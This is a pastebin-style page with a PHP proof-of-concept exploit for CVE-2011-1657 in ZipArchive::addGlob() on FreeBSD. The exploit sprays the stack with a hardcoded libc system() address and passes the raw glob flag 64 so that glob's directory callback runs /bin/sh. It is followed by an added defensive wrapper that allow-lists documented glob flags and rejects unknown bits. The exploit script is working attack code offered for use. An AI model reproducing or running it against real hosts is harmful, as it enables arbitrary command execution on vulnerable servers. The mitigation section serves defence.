Untitled

By: a guest on Jul 4th, 2011  |  syntax: PHP
```php
<?php
    /* CVE-2011-1657: PHP <= 5.3.6 ZipArchive::addGlob() missing glob flags filtering
     *
     * Lame and JustForFun FreeBSD PoC using GLOB_ALTDIRFUNC glob() flag to pown!
     *
     * (c) 2011 - Clement LECIGNE <clemun at gmail dot com>
     */

    /* Create a file for our md5_file() stack spray.
     */
    $system_addr = "\x50\x78\x8d\x28";  /* FreeBSD 8.2-RELEASE system() libc addr */
    $own = fopen("owned", "w");
    fwrite($own, str_repeat($system_addr, 4096/4));
    fclose($own);

    /* Fake zip, empty file is a valid zip.
     */
    $path = "foo.zip";
    if (file_exists($path)) {
        unlink($path);
    }
    fclose(fopen($path, "a"));
    $nx = new ZipArchive();
    $nx->open($path);

    /* Lame stack spraying \o/
     */
    md5_file("owned");

    /* Bing. globbuf.gl_opendir() = system()
     */
    $nx->addGlob("/bin/sh", 64);
?>
```
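The root cause above is that the flags argument is handed to libc glob() unfiltered, so a platform-specific bit such as GLOB_ALTDIRFUNC (the raw value 64 on FreeBSD) reaches the engine. The following is an added defensive example, not code from the paste or from PHP itself: a userland wrapper that only forwards the glob flags PHP documents as constants and refuses any other bit. The archive name and pattern are made-up values; upgrading to a fixed PHP remains the actual fix, this is an extra guard for application code.

```php
<?php
// Added example (not part of the original paste): allow-list the glob() flags
// that PHP defines as constants and reject everything else before
// ZipArchive::addGlob() is called, so undocumented libc bits never reach glob().

function allowedGlobFlags(): int
{
    $names = ['GLOB_BRACE', 'GLOB_MARK', 'GLOB_NOSORT', 'GLOB_NOCHECK',
              'GLOB_NOESCAPE', 'GLOB_ERR', 'GLOB_ONLYDIR'];
    $mask = 0;
    foreach ($names as $name) {
        if (defined($name)) {           // some constants are absent on some platforms
            $mask |= constant($name);
        }
    }
    return $mask;
}

function safeAddGlob(ZipArchive $zip, string $pattern, int $flags = 0, array $options = [])
{
    $unknown = $flags & ~allowedGlobFlags();
    if ($unknown !== 0) {
        // The paste's flag value 64 ends up here and is never forwarded.
        throw new InvalidArgumentException(sprintf(
            'addGlob(): rejected unsupported glob flag bits 0x%x', $unknown));
    }
    $added = $zip->addGlob($pattern, $flags, $options);   // array of added files or false
    if ($added === false) {
        throw new RuntimeException("addGlob() failed for pattern $pattern");
    }
    return $added;
}

// Usage (constructed paths): a documented flag passes, the raw value 64 is refused.
$zip = new ZipArchive();
if ($zip->open('example.zip', ZipArchive::CREATE) === true) {
    safeAddGlob($zip, '/var/www/html/*.txt', GLOB_NOSORT, ['remove_all_path' => true]);
    try {
        safeAddGlob($zip, '/var/www/html/*.txt', 64);
    } catch (InvalidArgumentException $e) {
        echo $e->getMessage(), PHP_EOL;
    }
    $zip->close();
}
```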